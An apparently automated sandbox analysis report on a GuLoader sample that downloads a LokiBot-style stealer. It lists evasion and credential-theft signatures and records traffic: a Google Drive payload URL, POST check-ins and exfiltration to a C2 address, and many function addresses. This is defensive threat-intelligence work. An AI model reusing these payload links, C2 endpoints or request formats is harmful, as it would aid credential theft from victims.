Loading ...

Play interactive tourEdit tour

Windows Analysis Report SecuriteInfo.com.__vbaHresultCheckObj.22789.613

Overview

General Information

Sample Name:SecuriteInfo.com.__vbaHresultCheckObj.22789.613 (renamed file extension from 613 to exe)
Analysis ID:483722
MD5:308fb834ee02960ec122cf34712fa871
SHA1:3162aff052c28b2ebf265eaaf5eadd0311e4299d
SHA256:a08af8c30e5a30a847fc94e370082ff8b9c9c7d5317d4fed0c3b4bc5854a496f
Tags:exe
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Hides threads from debuggers
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=16hJeQVa7vEC"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.503499325.0000000002AD0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    No Sigma rule has matched

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000000.00000002.503499325.0000000002AD0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=16hJeQVa7vEC"}
    Multi AV Scanner detection for submitted fileShow sources
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exeVirustotal: Detection: 23%Perma Link
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exeReversingLabs: Detection: 15%
    Multi AV Scanner detection for domain / URLShow sources
    Source: http://136.243.159.53/~element/page.php?id=121Virustotal: Detection: 6%Perma Link
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: unknownHTTPS traffic detected: 172.217.168.78:443 -> 192.168.2.3:49790 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.168.65:443 -> 192.168.2.3:49791 version: TLS 1.2

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49792 -> 136.243.159.53:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49792 -> 136.243.159.53:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49792 -> 136.243.159.53:80
    Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49792 -> 136.243.159.53:80
    Source: TrafficSnort IDS: 2410 WEB-PHP IGeneric Free Shopping Cart page.php access 192.168.2.3:49792 -> 136.243.159.53:80
    Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49793 -> 136.243.159.53:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49793 -> 136.243.159.53:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49793 -> 136.243.159.53:80
    Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49793 -> 136.243.159.53:80
    Source: TrafficSnort IDS: 2410 WEB-PHP IGeneric Free Shopping Cart page.php access 192.168.2.3:49793 -> 136.243.159.53:80
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49794 -> 136.243.159.53:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49794 -> 136.243.159.53:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49794 -> 136.243.159.53:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49794 -> 136.243.159.53:80
    Source: TrafficSnort IDS: 2410 WEB-PHP IGeneric Free Shopping Cart page.php access 192.168.2.3:49794 -> 136.243.159.53:80
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49795 -> 136.243.159.53:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49795 -> 136.243.159.53:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49795 -> 136.243.159.53:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49795 -> 136.243.159.53:80
    Source: TrafficSnort IDS: 2410 WEB-PHP IGeneric Free Shopping Cart page.php access 192.168.2.3:49795 -> 136.243.159.53:80
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=16hJeQVa7vEC
    Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Joe Sandbox ViewIP Address: 136.243.159.53 136.243.159.53
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16hJeQVa7vECqqXwxmeW5i0BX_hPCAorF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v3agssaj4m1da9uvntfjbdrnuso7gs0u/1631701050000/14094524972347321979/*/16hJeQVa7vECqqXwxmeW5i0BX_hPCAorF?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-5o-docs.googleusercontent.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: POST /~element/page.php?id=121 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.243.159.53Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA1747BCContent-Length: 190Connection: close
    Source: global trafficHTTP traffic detected: POST /~element/page.php?id=121 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.243.159.53Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA1747BCContent-Length: 190Connection: close
    Source: global trafficHTTP traffic detected: POST /~element/page.php?id=121 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.243.159.53Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA1747BCContent-Length: 163Connection: close
    Source: global trafficHTTP traffic detected: POST /~element/page.php?id=121 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.243.159.53Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA1747BCContent-Length: 163Connection: close
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: unknownTCP traffic detected without corresponding DNS query: 136.243.159.53
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Sep 2021 10:18:26 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732429567.00000000008D8000.00000004.00000020.sdmpString found in binary or memory: http://136.243.159.53/~element/page.php?id=121
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732429567.00000000008D8000.00000004.00000020.sdmpString found in binary or memory: http://136.243.159.53/~element/page.php?id=121.
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.724075568.000000000093F000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.722922786.0000000000938000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.724075568.000000000093F000.00000004.00000001.sdmpString found in binary or memory: https://doc-0c-5o-docs.googleusercontent.com/
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.724075568.000000000093F000.00000004.00000001.sdmpString found in binary or memory: https://doc-0c-5o-docs.googleusercontent.com/-
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.722932523.0000000000940000.00000004.00000001.sdmp, SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732485311.0000000000924000.00000004.00000020.sdmp, SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.722922786.0000000000938000.00000004.00000001.sdmpString found in binary or memory: https://doc-0c-5o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v3agssaj
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.724075568.000000000093F000.00000004.00000001.sdmpString found in binary or memory: https://doc-0c-5o-docs.googleusercontent.com/tography
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732429567.00000000008D8000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732429567.00000000008D8000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16hJeQVa7vECqqXwxmeW5i0BX_hPCAorF
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732625102.0000000002270000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16hJeQVa7vECqqXwxmeW5i0BX_hPCAorFwininet.dllMozilla/5
    Source: unknownHTTP traffic detected: POST /~element/page.php?id=121 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.243.159.53Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA1747BCContent-Length: 190Connection: close
    Source: unknownDNS traffic detected: queries for: drive.google.com
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16hJeQVa7vECqqXwxmeW5i0BX_hPCAorF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v3agssaj4m1da9uvntfjbdrnuso7gs0u/1631701050000/14094524972347321979/*/16hJeQVa7vECqqXwxmeW5i0BX_hPCAorF?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-5o-docs.googleusercontent.comConnection: Keep-Alive
    Source: unknownHTTPS traffic detected: 172.217.168.78:443 -> 192.168.2.3:49790 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.168.65:443 -> 192.168.2.3:49791 version: TLS 1.2

    System Summary:

    barindex
    Potential malicious icon foundShow sources
    Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
    Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD588F0_2_02AD588F
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD06880_2_02AD0688
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD0E9C0_2_02AD0E9C
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD54910_2_02AD5491
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD58DE0_2_02AD58DE
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD987C0_2_02AD987C
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD5B660_2_02AD5B66
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD12AF0_2_02AD12AF
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD98AF0_2_02AD98AF
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD2EAE0_2_02AD2EAE
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD0EA90_2_02AD0EA9
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD84A70_2_02AD84A7
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD9AA10_2_02AD9AA1
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD20BC0_2_02AD20BC
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD2AB10_2_02AD2AB1
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD60B10_2_02AD60B1
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD3AB30_2_02AD3AB3
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD8E8D0_2_02AD8E8D
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD46890_2_02AD4689
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD60810_2_02AD6081
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD8E9D0_2_02AD8E9D
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD0E990_2_02AD0E99
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD829A0_2_02AD829A
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD8CE90_2_02AD8CE9
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD36E80_2_02AD36E8
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD0AE40_2_02AD0AE4
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD8AE10_2_02AD8AE1
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD1CFE0_2_02AD1CFE
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD2AF00_2_02AD2AF0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD30CC0_2_02AD30CC
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD08C40_2_02AD08C4
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD20C70_2_02AD20C7
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD0AC20_2_02AD0AC2
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD8E2D0_2_02AD8E2D
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD60350_2_02AD6035
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD0A300_2_02AD0A30
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD44080_2_02AD4408
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD10000_2_02AD1000
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD0A170_2_02AD0A17
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD14170_2_02AD1417
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD327C0_2_02AD327C
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD1C740_2_02AD1C74
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD92770_2_02AD9277
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD26720_2_02AD2672
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD4A720_2_02AD4A72
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD3A450_2_02AD3A45
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD4DA90_2_02AD4DA9
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD5FBB0_2_02AD5FBB
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD09BA0_2_02AD09BA
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD39B10_2_02AD39B1
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD8BB30_2_02AD8BB3
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD23840_2_02AD2384
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD55820_2_02AD5582
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD159D0_2_02AD159D
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD8D9D0_2_02AD8D9D
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD7B980_2_02AD7B98
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD3F960_2_02AD3F96
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD1F910_2_02AD1F91
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD07E70_2_02AD07E7
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD07E10_2_02AD07E1
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD89F60_2_02AD89F6
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD05F30_2_02AD05F3
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD07C30_2_02AD07C3
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD47D00_2_02AD47D0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD4F3F0_2_02AD4F3F
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD833A0_2_02AD833A
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD49350_2_02AD4935
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD2F080_2_02AD2F08
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD41020_2_02AD4102
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD111F0_2_02AD111F
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD8D7E0_2_02AD8D7E
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD614D0_2_02AD614D
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD7D4A0_2_02AD7D4A
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD5F5B0_2_02AD5F5B
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD99550_2_02AD9955
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD13500_2_02AD1350
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD0E9C NtWriteVirtualMemory,TerminateProcess,0_2_02AD0E9C
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD5491 NtWriteVirtualMemory,0_2_02AD5491
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD944B NtProtectVirtualMemory,0_2_02AD944B
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD5B66 NtAllocateVirtualMemory,0_2_02AD5B66
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD2EAE NtWriteVirtualMemory,0_2_02AD2EAE
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD50B2 NtWriteVirtualMemory,0_2_02AD50B2
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD4689 NtWriteVirtualMemory,0_2_02AD4689
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD5C2A NtAllocateVirtualMemory,0_2_02AD5C2A
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD940C NtProtectVirtualMemory,0_2_02AD940C
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD2672 NtWriteVirtualMemory,0_2_02AD2672
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD4A72 NtWriteVirtualMemory,0_2_02AD4A72
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD4DA9 NtWriteVirtualMemory,0_2_02AD4DA9
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD7B98 NtWriteVirtualMemory,0_2_02AD7B98
    Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exeCode function: 0_2_02AD1F91 NtWriteVirtualMemory,0_2_02AD1F91
